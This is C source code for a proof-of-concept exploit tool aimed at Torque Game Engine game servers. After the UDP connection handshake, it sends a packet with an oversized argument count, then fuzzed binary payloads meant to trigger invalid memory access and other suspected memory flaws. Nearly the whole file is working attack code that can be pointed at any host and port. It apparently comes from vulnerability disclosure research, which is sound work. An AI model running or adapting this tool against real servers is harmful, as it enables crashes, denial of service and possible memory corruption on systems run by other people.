/*

  by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include "rwbits.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
    #define stricmp strcasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        28000
#define BUFFSZ      1500    // max packet size, while all the strings are fixed at max 256
#define PADDING(X)  ((X + 7) & (~7))



void fgetz(u8 *data, int len);
int write_bstr(u8 *data, int b, u8 *str, int len);
int udp_sock(void);
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



   enum PacketTypes
   {
      MasterServerGameTypesRequest  = 2,
      MasterServerGameTypesResponse = 4,
      MasterServerListRequest       = 6,
      MasterServerListResponse      = 8,
      GameMasterInfoRequest         = 10,
      GameMasterInfoResponse        = 12,
      GamePingRequest               = 14,
      GamePingResponse              = 16,
      GameInfoRequest               = 18,
      GameInfoResponse              = 20,
      GameHeartbeat                 = 22,

      ConnectChallengeRequest       = 26,
      ConnectChallengeReject        = 28,
      ConnectChallengeResponse      = 30,
      ConnectRequest                = 32,
      ConnectReject                 = 34,
      ConnectAccept                 = 36,
      Disconnect                    = 38,
   };
enum NetPacketType
{
   DataPacket,
   PingPacket,
   AckPacket,
   InvalidPacketType,
};

// some pre-built names for testing this proof-of-concept with the
// example games and demos and various games (like Legends)
u8  *test_gamenames[] = {
    "Torque Game Engine Demo",
    "FPS Example",
    "PhysX",
    "3DRc",
    "Metal Drift",
    "",
    NULL
};



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            b,
            len,
            tg      = 0,
            bug;
    u16     port    = PORT;
    u8      buff[BUFFSZ],
            password[256] = "",
            digest[16],
            gamename_tmp[256] = "",
            *gamename,
            *host;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Torque game engine invalid memory access "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug> <host> [port(%hu)]>\n"
            "\n"
            "Bugs:\n"
            " 1 = invalid memory access through too much arguments\n"
            " 2 = possible vulnerability 1\n"
            " 3 = possible vulnerability 2\n"
            " 4 = possible vulnerability 3\n"
            " 5 = possible vulnerability 4\n"
            " 6 = possible vulnerability 5\n"
            "\n", argv[0], port);
        exit(1);
    }

    bug = atoi(argv[1]);
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    gamename = test_gamenames[tg];
redo:
    sd = udp_sock();

    b = 0;
    b = write_bits(ConnectChallengeRequest, 8, buff, b);
    b = write_bits(0,    32, buff, b);      // connectSequence
    len = send_recv(sd, buff, PADDING(b)>>3, buff, BUFFSZ, &peer, 1);
    memcpy(digest, buff + 5, 16);

    b = 0;
    b = write_bits(ConnectRequest, 8, buff, b);
    b = write_bits(0,    32, buff, b);      // connectSequence
    b = write_bstr(buff,  b, digest, 16);   // addressDigest
    b = write_bstr(buff,  b, "GameConnection", -1); // connectionClass: GameConnection, MessageForwarder, Message, EventManager, UndoManager, FileDownloadRequestEvent and so on
    b = write_bits(0,    32, buff, b);      // classGroup
    b = write_bits(-1,   32, buff, b);      // classCRC
    b = write_bstr(buff,  b, gamename, -1); // gameString, it MUST match the one on the server!
    b = write_bits(9999, 32, buff, b);      // currentProtocol (12)
    b = write_bits(0,    32, buff, b);      // minProtocol (12)
    b = write_bstr(buff,  b, password, -1); // password
    if(bug == 1) {
        b = write_bits(-1,   32, buff, b);  // arguments (too big)
    } else {
        b = write_bits(1,    32, buff, b);  // arguments
    }
    b = write_bstr(buff,  b, "mynick", -1); // the first argument
    len = send_recv(sd, buff, PADDING(b)>>3, buff, BUFFSZ, &peer, 1);

    while((buff[0] == 0x26) && !buff[6]) {
        len = send_recv(sd, NULL, 0, buff, BUFFSZ, &peer, 1);
    }
    if(buff[0] == 0x22) {
        close(sd);  // need to change the socket
        if(buff[5] == 0x10) {
            gamename = NULL;
            if(test_gamenames[tg]) gamename = test_gamenames[++tg];
            if(!gamename) {
                printf("\n"
                    "- insert the gameString name for this game, if you don't know it open the game\n"
                    "  executable with a hex editor and search the string after CHR_PROTOCOL:\n"
                    "  ");
                fgetz(gamename_tmp, sizeof(gamename_tmp));
                gamename = gamename_tmp;
            }
            printf("\n- test gameString %s\n", gamename);
            goto redo;
            printf("\nError: invalid gameString name\n");
            exit(1);
        } else if(buff[5] == 0x18) {
            printf("\n- server protected by password, insert the keyword:\n  ");
            fgetz(password, sizeof(password));
            goto redo;
        } else if(buff[5] == 0x1a) {
            printf("\nError: server full, retry later\n");
            exit(1);
        //} else {
            //printf("\nError: player seems to have been not accepted (%02x %02x), I try to continue\n", buff[0], buff[5]);
            //exit(1);
        }
    }

    if(bug > 1) {
        sleep(ONESEC);  // needed?

        b = 0;
        b = write_bits(1,     1, buff, b);      // processRawPacket
        b = write_bits(0,     1, buff, b);      // pkConnectSeqBit
        b = write_bits(1,     9, buff, b);      // pkSequenceNumber
        b = write_bits(0,     9, buff, b);      // pkHighestAck
        b = write_bits(DataPacket, 2, buff, b); // pkPacketType
        b = write_bits(0,     3, buff, b);      // pkAckByteCount
        //b = write_bits(-1,  8*4, buff, b);      // pkAckMask (pkAckByteCount * 4)

        // oh yeah, fuzzing makes miracles moreover with an engine of a similar complexity
        if(bug == 2) {
            b = write_bstr(buff,  b,
                "\x4c\x6f\xbb\xc9\xb4\x53\xe5\x8a\x92\x86\x98\xfd\x66\xc8\x35\x92"
                "\x86\x18\x3d\x86\x18\xbd\x46\x78\xad\x5e\xd4\xa3\x6d\xbe\xc4\xbb"
                "\xc9\xb4\x53\xe5\x8a\x12\x46\x78\x2d\x1e\xb4\xd3\xa5\xea\x82\x9e"
                "\x74\xb3\x55\x62\xce\xac\x5f\xd3\x25\xaa\x62\xce\xac\x5f\x53\xe5"
                "\x0a\xd2\x26\xa8\x65\x4a\x72\xb6\x50\xe9\x04\xdb\x19\xbc\xc7\x37"
                "\x8f\x0b\x51\x68\xc5\x3a\x0a\x52\x66\xc8\xb5\xd2\x26\x28\xa5\x6a"
                "\xc2\x3e\x04\xdb\x99\xfc\x67\xc7\x37\x8f\x0b\xd1\xa8\x65\x4a\x72"
                "\xb6\x50\x69\x44\x7b\x29\xa4\x6b\x41\x80\x21\xb0\x59\x5c\xd7\x9f", 128);
        } else if((bug == 3) || (bug == 4)) {
            b = write_bstr(buff,  b,
                "\x44\x7b\x29\x24\x2b\x21\x30\x99\x7c\x27\x27\x27\x27\x27\xa7\xe7"
                "\x07\x57\x5f\x53\xe5\x0a\x52\xe6\x88\x95\x02\x5e\x54\x63\xcd\x2e"
                "\x9c\xf7\x6f\x3b\x09\x54\x63\xcd\xae\x5c\xd7\x1f\x33\x95\x82\x9e"
                "\xf4\x73\xb5\xd2\xa6\x68\xc5\xba\x4a\xf2\x76\xb0\xd9\x1c\x37\x0f"
                "\xcb\x31\x98\xfd\x66\x48\x75\x32\x96\x00\x61\x50\xe9\x04\x5b\xd9"
                "\x9c\xf7\x6f\x3b\x09\xd4\xa3\x6d\x3e\x04\xdb\x99\xfc\xe7\x87\x97"
                "\xff\x63\xcd\x2e\x9c\xf7\xef\xfb\x69\x44\x7b\x29\xa4\xeb\x81\x20"
                "\x31\x98\xfd\xe6\x08\x55\xe2\x0e\xcc\xaf\x5b\xd9\x9c\x77\x2f\x1b",
                (bug == 3) ? 90 : 120);
        } else if(bug == 5) {
            b = write_bstr(buff,  b,
                "\xfe\xe4\x8b\x91\x08\x55\x62\x4e\x6c\xbf\x43\x7d\xa6\x68\xc5\xba"
                "\xca\xb2\xd6\xa0\xf1\xf8\x6d\xbe\xc4\xbb\xc9\xb4\xd3\x25\x2a\xa2"
                "\x6e\x3c\x87\x97\xff\xe3\x0d\xce\x2c\x9f\xf3\xf5\xf2\xf6\x70\x39"
                "\x8c\x8f\x8b\x91\x08\x55\x62\xce\xac\x5f\x53\x65\x4a\xf2\x76\x30"
                "\x19\x3c\x87\x97\xff\x63\xcd\xae\x5c\x57\x5f\xd3\x25\x2a\x22\x2e"
                "\x1c\x37\x0f\xcb\xb1\xd8\x9d\x76\xb0\x59\xdc\x97\x7f\x23\xad\xde"
                "\x14\xc3\x3d\x06\x58\x5d\xd6\x20\x31\x98\xfd\x66\x48\x75\xb2\x56"
                "\xe0\x11\xc8\xb5\x52\xe6\x88\x95\x82\x9e\x74\xb3\x55\xe2\x8e\x0c"
                "\xcf\x2b\x21\xb0\x59\x5c\x57\xdf\x93\x05\xda\x1a\xba\x4a\x72\xb6"
                "\x50\xe9\x04\x5b\x59\xdc\x97\x7f\x23\xad\xde\x14\x43\xfd\xe6\x88"
                "\x15\x42\xfe\x64\xcb\x31\x18\xbd\x46\xf8\xed\xfe\xe4\x0b\x51\x68"
                "\x45\x7a\x2a\xa2\x6e\x3c\x07\xd7\x9f\xf3\x75\xb2\x56\xe0\x11\x48"
                "\x75\x32\x96\x00\xe1\x90\x09\x54\x63\xcd\x2e\x1c\xb7\x4f\xeb\x81"
                "\xa0\x71\xb8\xcd\xae\x5c\x57\x5f\xd3\x25\x2a\xa2\xee\xfc\xe7\x87"
                "\x97\xff\x63\x4d\x6e\xbc\x47\xf7\xef\xfb\x69\xc4\x3b\x89\x94\x83"
                "\x9d\xf6\xf0\xf9\xec\xff\xe3\x8d\x0e\x4c\x6f\x3b\x89\x94\x83\x1d"
                "\x36\x10\x49\x74\xb3\xd5\xa2\xee\xfc\xe7\x07\x57\xdf\x93\x85\x9a"
                "\x7a\x2a\x22\x2e\x9c\xf7\xef\x7b\x29\x24\x2b\x21\x30\x99\x7c\x27"
                "\xa7\x67\xc7\xb7\xcf\xab\xe1\x90", 296);
        } else if(bug == 6) {
            b = write_bstr(buff,  b,
                "\x8c\x8f\x8b\x91\x08\x55\x62\x4e\xec\xff\x63\x4d\xee\x7c\x27\x27"
                "\x27\xa7\x67\x47\xf7\x6f\xbb\xc9\x34\x93\x05\x5a\xda\x1a\x3a\x8a"
                "\x12\xc6\x38\x0d\xce\x2c\x9f\x73\xb5\xd2\x26\xa8\x65\xca\x32\x16", 40);
        } else {
            printf("\nError: invalid bug number (%d)\n", bug);
            exit(1);
        }
        len = send_recv(sd, buff, PADDING(b)>>3, NULL, 0, &peer, 0);
        len = send_recv(sd, buff, PADDING(b)>>3, NULL, 0, &peer, 0);    // mah 2 times

        sleep(ONESEC);  // needed
    }

    /* disconnection packet, not needed
    b = 0;
    b = write_bits(Disconnect, 8, buff, b);
    b = write_bits(0,    32, buff, b);      // connectSequence
    b = write_bstr(buff,  b, "no reason to quit", -1);
    len = send_recv(sd, buff, PADDING(b)>>3, buff, BUFFSZ, &peer, 1);
    */

    printf("\n- done\n");
    close(sd);
    return(0);
}



void fgetz(u8 *data, int len) {
    u8      *p;
    fgets(data, len, stdin);
    for(p = data; *p && (*p != '\r') && (*p != '\n'); p++);
    *p = 0;
}



int write_bstr(u8 *data, int b, u8 *str, int len) {
    int     i;

    if(len < 0) {   // for the strings use the writeString method
        len = strlen(str);
        b = write_bits(0,   1, data, b);    // huffman compression
        b = write_bits(len, 8, data, b);    // string length
    }
    for(i = 0; i < len; i++) {
        b = write_bits(str[i], 8, data, b);
    }
    return(b);
}



int udp_sock(void) {
    struct  linger  ling = {1,1};
    int     sd;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
    return(sd);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        fputc('.', stdout);
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) goto quit;
        return(0);
    }
    if(in) {
        for(retry = 2; retry; retry--) {
            fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!timeout(sd, 1)) break;
        }

        if(!retry) {
            if(!err) return(-1);
            printf("\nError: socket timeout, no reply received\n\n");
            exit(1);
        }
    } else {
        if(timeout(sd, 3) < 0) return(-1);
    }

    fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


